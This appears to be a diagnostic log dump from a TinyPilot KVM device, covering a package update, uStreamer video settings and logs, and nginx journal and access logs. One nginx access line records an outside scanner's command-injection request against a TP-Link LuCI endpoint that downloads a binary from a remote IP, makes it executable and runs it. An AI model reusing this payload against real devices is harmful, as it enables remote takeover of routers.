./ustreamer_5.43-20231004144402_armhf.deb ./tinypilot_20240620111245_armhf.deb Reading package lists... Building dependency tree... Reading state information... janus is already the newest version (1.0.1-1~bpo11+1). The following package was automatically installed and is no longer required: dos2unix Use 'sudo apt autoremove' to remove it. The following packages will be upgraded: tinypilot ustreamer 2 upgraded, 0 newly installed, 0 to remove and 112 not upgraded. Need to get 0 B/2,815 kB of archives. After this operation, 316 kB of additional disk space will be used. Get:1 /mnt/tinypilot-installer/ustreamer_5.43-20231004144402_armhf.deb ustreamer armhf 5.43-20231004144402 [158 kB] Get:2 /mnt/tinypilot-installer/tinypilot_20240620111245_armhf.deb tinypilot armhf 20240620111245 [2,657 kB] apt-listchanges: Reading changelogs... debconf: unable to initialize frontend: Dialog debconf: (Dialog frontend will not work on a dumb terminal, an emacs shell buffer, or without a controlling terminal.) debconf: falling back to frontend: Readline debconf: unable to initialize frontend: Readline debconf: (This frontend requires a controlling tty.) debconf: falling back to frontend: Teletype dpkg-preconfigure: unable to re-open stdin: [614B blob data] Preparing to unpack .../ustreamer_5.43-20231004144402_armhf.deb ... Unpacking ustreamer (5.43-20231004144402) over (5.38-20230802141939) ... Preparing to unpack .../tinypilot_20240620111245_armhf.deb ... Unpacking tinypilot (20240620111245) over (20230904111604) ... Setting up ustreamer (5.43-20231004144402) ... Warning: The home dir /home/ustreamer you specified already exists. The system user `ustreamer' already exists. Exiting. Setting up tinypilot (20240620111245) ... Installing new version of config file /etc/sudoers.d/tinypilot ... Warning: The home dir /home/tinypilot you specified already exists. The system user `tinypilot' already exists. Exiting. /opt/tinypilot / / /opt/tinypilot / / /opt/tinypilot / / nginx: the configuration file /etc/nginx/nginx.conf syntax is ok nginx: configuration file /etc/nginx/nginx.conf test is successful active /opt/tinypilot / / update-tls-cert-common-name.service is a disabled or a static unit not running, not starting it. Processing triggers for man-db (2.9.4-2) ... /usr/bin/mandb: fopen /var/cache/man/da/index.db: Structure needs cleaning /usr/bin/mandb: can't rename /var/cache/man/da/9174 to /var/cache/man/da/index.db: Structure needs cleaning /usr/bin/mandb: can't chmod /var/cache/man/da/index.db: Structure needs cleaning /usr/bin/mandb: can't remove /var/cache/man/da/index.db: Structure needs cleaning /usr/bin/mandb: warning: can't update index cache /var/cache/man/da/index.db: Structure needs cleaning + mv yq /usr/bin/yq + chmod 0755 /usr/bin/yq + clean_up + sudo umount --lazy /mnt/tinypilot-installer + sudo rm -rf /opt/tinypilot-updater /mnt/tinypilot-installer 2024-08-06 04:38:55.397 __main__ INFO Update completed successfully 2024-08-06 04:38:55.398 update.result_store INFO Writing result file to /home/tinypilot/logs/latest-update-result.json 2024-08-06 04:38:55.401 update.target_version INFO Clearing target version file /home/tinypilot/target-version uStreamer configuration ==> /opt/ustreamer-launcher/configs.d/000-defaults.yml <== # Settings for TC358743 HDMI to CSI-2 bridge, which are included on the # TinyPilot Voyager series of devices. --- ustreamer_encoder: m2m-image ustreamer_format: uyvy ustreamer_use_dv_timings: true ustreamer_workers: "3" ustreamer_drop_same_frames: "30" ==> /opt/ustreamer-launcher/configs.d/100-tinypilot.yml <== janus_stun_port: 19302 janus_stun_server: stun.l.google.com ustreamer_desired_fps: 15 ustreamer_h264_bitrate: 3100 ustreamer_quality: 60 uStreamer logs Aug 14 04:51:10 tinypilot systemd[1]: ustreamer.service: Consumed 1.896s CPU time. Aug 14 04:51:10 tinypilot systemd[1]: Started uStreamer - Lightweight, optimized video encoder. Aug 14 04:51:10 tinypilot launch[28534]: + exec /opt/ustreamer/ustreamer --port 48001 --persistent --h264-sink tinypilot::ustreamer::h264 --h264-sink-mode 777 --h264-sink-rm --encoder m2m-image --format uyvy --desired-fps 15 --workers 3 --quality 60 --drop-same-frames 30 --dv-timings --h264-bitrate 3100 Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.887 main] -- Starting PiKVM uStreamer 5.43 ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.887 main] -- Using internal blank placeholder Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.887 main] -- Using H264-sink: tinypilot::ustreamer::h264 Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.888 main] -- Listening HTTP on [127.0.0.1]:48001 Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.888 stream] -- Using V4L2 device: /dev/video0 Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.888 stream] -- Using desired FPS: 15 Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.888 http] -- Starting HTTP eventloop ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.888 stream] -- H264: Initializing encoder ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.896 stream] -- H264: Configuring encoder: DMA=0 ... Aug 14 04:51:10 tinypilot launch[28534]: ================================================================================ Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.915 stream] -- Device fd=10 opened Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.915 stream] -- Using input channel: 0 Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.921 stream] -- Got new DV-timings: 1920x1080p30.00, pixclk=74250000, vsync=45, hsync=280 Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.941 stream] -- Using resolution: 1920x1080 Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.942 stream] -- Using format: UYVY Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.942 stream] -- Querying HW FPS changing is not supported Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.942 stream] -- Using IO method: MMAP Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.952 stream] -- Requested 5 device buffers, got 5 Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.958 stream] -- Capturing started Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.959 stream] -- JPEG-0: Initializing encoder ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.959 stream] -- JPEG-1: Initializing encoder ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.959 stream] -- JPEG-2: Initializing encoder ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.959 stream] -- Using JPEG quality: 60% Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.959 stream] -- Creating pool JPEG with 3 workers ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.959 stream] -- Capturing ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.964 stream] -- H264: Configuring encoder: DMA=1 ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691889.964 jw-0] -- JPEG-0: Configuring encoder: DMA=0 ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691890.007 jw-1] -- JPEG-1: Configuring encoder: DMA=0 ... Aug 14 04:51:10 tinypilot launch[28534]: -- INFO [691890.030 jw-2] -- JPEG-2: Configuring encoder: DMA=0 ... Aug 14 04:51:11 tinypilot launch[28534]: -- INFO [691891.044 http] -- HTTP: NEW client (now=1): [fe80::7b7:421a:a784:1e31]:44106, id=1dec7e572e9bb397 Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.863 main] -- ===== Stopping by SIGTERM ===== Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.863 http] -- HTTP eventloop stopped Aug 14 04:54:21 tinypilot systemd[1]: Stopping uStreamer - Lightweight, optimized video encoder... Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.918 stream] -- Destroying workers pool JPEG ... Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.944 stream] -- Capturing stopped Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.948 stream] -- Device fd=10 closed Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.948 stream] -- H264: Destroying encoder ... Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.952 main] -- JPEG-0: Destroying encoder ... Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.961 main] -- JPEG-1: Destroying encoder ... Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.970 main] -- JPEG-2: Destroying encoder ... Aug 14 04:54:21 tinypilot launch[28534]: -- INFO [692080.979 main] -- Bye-bye Aug 14 04:54:21 tinypilot systemd[1]: ustreamer.service: Succeeded. Aug 14 04:54:21 tinypilot systemd[1]: Stopped uStreamer - Lightweight, optimized video encoder. Aug 14 04:54:21 tinypilot systemd[1]: ustreamer.service: Consumed 25.204s CPU time. Aug 14 04:54:21 tinypilot systemd[1]: Started uStreamer - Lightweight, optimized video encoder. Aug 14 04:54:21 tinypilot launch[28899]: + exec /opt/ustreamer/ustreamer --port 48001 --persistent --h264-sink tinypilot::ustreamer::h264 --h264-sink-mode 777 --h264-sink-rm --encoder m2m-image --format uyvy --desired-fps 15 --workers 3 --quality 60 --drop-same-frames 30 --dv-timings --h264-bitrate 3100 Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.239 main] -- Starting PiKVM uStreamer 5.43 ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.239 main] -- Using internal blank placeholder Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.239 main] -- Using H264-sink: tinypilot::ustreamer::h264 Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.240 main] -- Listening HTTP on [127.0.0.1]:48001 Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.240 stream] -- Using V4L2 device: /dev/video0 Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.240 stream] -- Using desired FPS: 15 Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.240 http] -- Starting HTTP eventloop ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.240 stream] -- H264: Initializing encoder ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.248 stream] -- H264: Configuring encoder: DMA=0 ... Aug 14 04:54:21 tinypilot launch[28899]: ================================================================================ Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.266 stream] -- Device fd=10 opened Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.266 stream] -- Using input channel: 0 Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.273 stream] -- Got new DV-timings: 1920x1080p30.00, pixclk=74250000, vsync=45, hsync=280 Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.293 stream] -- Using resolution: 1920x1080 Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.293 stream] -- Using format: UYVY Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.293 stream] -- Querying HW FPS changing is not supported Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.293 stream] -- Using IO method: MMAP Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.305 stream] -- Requested 5 device buffers, got 5 Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.312 stream] -- Capturing started Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.312 stream] -- JPEG-0: Initializing encoder ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.312 stream] -- JPEG-1: Initializing encoder ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.312 stream] -- JPEG-2: Initializing encoder ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.312 stream] -- Using JPEG quality: 60% Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.312 stream] -- Creating pool JPEG with 3 workers ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.313 stream] -- Capturing ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.329 stream] -- H264: Configuring encoder: DMA=1 ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.329 jw-0] -- JPEG-0: Configuring encoder: DMA=0 ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.380 jw-1] -- JPEG-1: Configuring encoder: DMA=0 ... Aug 14 04:54:21 tinypilot launch[28899]: -- INFO [692081.396 jw-2] -- JPEG-2: Configuring encoder: DMA=0 ... Aug 14 04:54:23 tinypilot launch[28899]: -- INFO [692083.434 http] -- HTTP: NEW client (now=1): [fe80::7b7:421a:a784:1e31]:56036, id=939e0d1a8b2db69d Aug 15 01:21:07 tinypilot launch[28899]: -- INFO [765686.807 http] -- HTTP: DEL client (now=0): [fe80::7b7:421a:a784:1e31]:56036, id=939e0d1a8b2db69d, Connection reset by peer (reading,error) nginx logs -- Journal begins at Tue 2024-08-06 04:38:56 BST, ends at Thu 2024-08-15 02:07:50 BST. -- Aug 06 04:39:04 tinypilot systemd[1]: Starting A high performance web server and a reverse proxy server... Aug 06 04:39:09 tinypilot systemd[1]: Started A high performance web server and a reverse proxy server. Aug 06 04:59:34 tinypilot systemd[1]: Stopping A high performance web server and a reverse proxy server... Aug 06 04:59:39 tinypilot systemd[1]: nginx.service: Stopping timed out. Terminating. Aug 06 04:59:39 tinypilot systemd[1]: nginx.service: Failed with result 'timeout'. Aug 06 04:59:39 tinypilot systemd[1]: Stopped A high performance web server and a reverse proxy server. Aug 06 04:59:39 tinypilot systemd[1]: Starting A high performance web server and a reverse proxy server... Aug 06 04:59:39 tinypilot systemd[1]: Started A high performance web server and a reverse proxy server. Aug 06 05:00:38 tinypilot systemd[1]: Stopping A high performance web server and a reverse proxy server... Aug 06 05:00:38 tinypilot systemd[1]: nginx.service: Succeeded. Aug 06 05:00:38 tinypilot systemd[1]: Stopped A high performance web server and a reverse proxy server. Aug 06 05:00:38 tinypilot systemd[1]: Starting A high performance web server and a reverse proxy server... Aug 06 05:00:38 tinypilot systemd[1]: Started A high performance web server and a reverse proxy server. Aug 06 05:01:34 tinypilot systemd[1]: Stopping A high performance web server and a reverse proxy server... Aug 06 05:01:39 tinypilot systemd[1]: nginx.service: Stopping timed out. Terminating. Aug 06 05:01:39 tinypilot systemd[1]: nginx.service: Failed with result 'timeout'. Aug 06 05:01:39 tinypilot systemd[1]: Stopped A high performance web server and a reverse proxy server. Aug 06 05:01:39 tinypilot systemd[1]: Starting A high performance web server and a reverse proxy server... Aug 06 05:01:39 tinypilot systemd[1]: Started A high performance web server and a reverse proxy server. Aug 06 05:02:32 tinypilot systemd[1]: Stopping A high performance web server and a reverse proxy server... Aug 06 05:02:32 tinypilot systemd[1]: nginx.service: Succeeded. Aug 06 05:02:32 tinypilot systemd[1]: Stopped A high performance web server and a reverse proxy server. Aug 06 05:02:32 tinypilot systemd[1]: nginx.service: Consumed 2.515s CPU time. Aug 06 05:02:32 tinypilot systemd[1]: Starting A high performance web server and a reverse proxy server... Aug 06 05:02:32 tinypilot systemd[1]: Started A high performance web server and a reverse proxy server. 154.213.185.140 - - [15/Aug/2024:01:08:19 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>+cd+%2Ftmp+wget+http%3A%2F%2F45.66.231.213%2Fr%3B+curl+-O+http%3A%2F%2F45.66.231.213%2Fr%3B+chmod+%2Bx+r%3B+.%2Fr%20tplink) HTTP/1.1" 400 559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 188.246.187.14 - - [15/Aug/2024:01:10:49 +0100] "GET / HTTP/1.1" 200 263196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 192.168.1.27 - - [15/Aug/2024:01:20:00 +0100] "GET /socket.io/?EIO=4&transport=websocket&sid=s-OiidILuNt4LTknAABc HTTP/1.1" 101 16908 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 192.168.1.27 - - [15/Aug/2024:01:20:23 +0100] "GET /janus/ws HTTP/1.1" 101 272936 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" fe80::7b7:421a:a784:1e31 - - [15/Aug/2024:01:21:07 +0100] "GET /stream?advance_headers=1 HTTP/2.0" 200 3959641328 "https://tinypilot/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 46.33.33.143 - - [15/Aug/2024:01:27:48 +0100] "GET / HTTP/1.1" 200 263196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 78.108.177.51 - - [15/Aug/2024:01:35:55 +0100] "GET / HTTP/1.0" 200 263196 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" 192.168.1.27 - - [15/Aug/2024:02:01:01 +0100] "GET /socket.io/?EIO=4&transport=polling&t=P5JZM1X HTTP/2.0" 200 97 "https://tinypilot/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 192.168.1.27 - - [15/Aug/2024:02:01:01 +0100] "POST /socket.io/?EIO=4&transport=polling&t=P5JZMLY&sid=cSjf_4GS84dCXBNGAABe HTTP/2.0" 200 2 "https://tinypilot/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 192.168.1.27 - - [15/Aug/2024:02:01:01 +0100] "GET /socket.io/?EIO=4&transport=polling&t=P5JZMLZ&sid=cSjf_4GS84dCXBNGAABe HTTP/2.0" 200 32 "https://tinypilot/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 192.168.1.27 - - [15/Aug/2024:02:01:02 +0100] "GET /socket.io/?EIO=4&transport=polling&t=P5JZMM6&sid=cSjf_4GS84dCXBNGAABe HTTP/2.0" 200 1 "https://tinypilot/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 192.168.1.27 - - [15/Aug/2024:02:04:19 +0100] "GET /socket.io/?EIO=4&transport=websocket&sid=cSjf_4GS84dCXBNGAABe HTTP/1.1" 101 70 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 192.168.1.27 - - [15/Aug/2024:02:05:35 +0100] "GET /socket.io/?EIO=4&transport=polling&t=P5JaPA_ HTTP/2.0" 200 97 "https://tinypilot/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 192.168.1.27 - - [15/Aug/2024:02:05:35 +0100] "POST /socket.io/?EIO=4&transport=polling&t=P5JaPFe&sid=bbWThl_XQxXaRTaYAABg HTTP/2.0" 200 2 "https://tinypilot/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 192.168.1.27 - - [15/Aug/2024:02:05:35 +0100] "GET /socket.io/?EIO=4&transport=polling&t=P5JaPFf&sid=bbWThl_XQxXaRTaYAABg HTTP/2.0" 200 32 "https://tinypilot/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 192.168.1.27 - - [15/Aug/2024:02:05:35 +0100] "GET /socket.io/?EIO=4&transport=polling&t=P5JaPHr&sid=bbWThl_XQxXaRTaYAABg HTTP/2.0" 200 1 "https://tinypilot/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"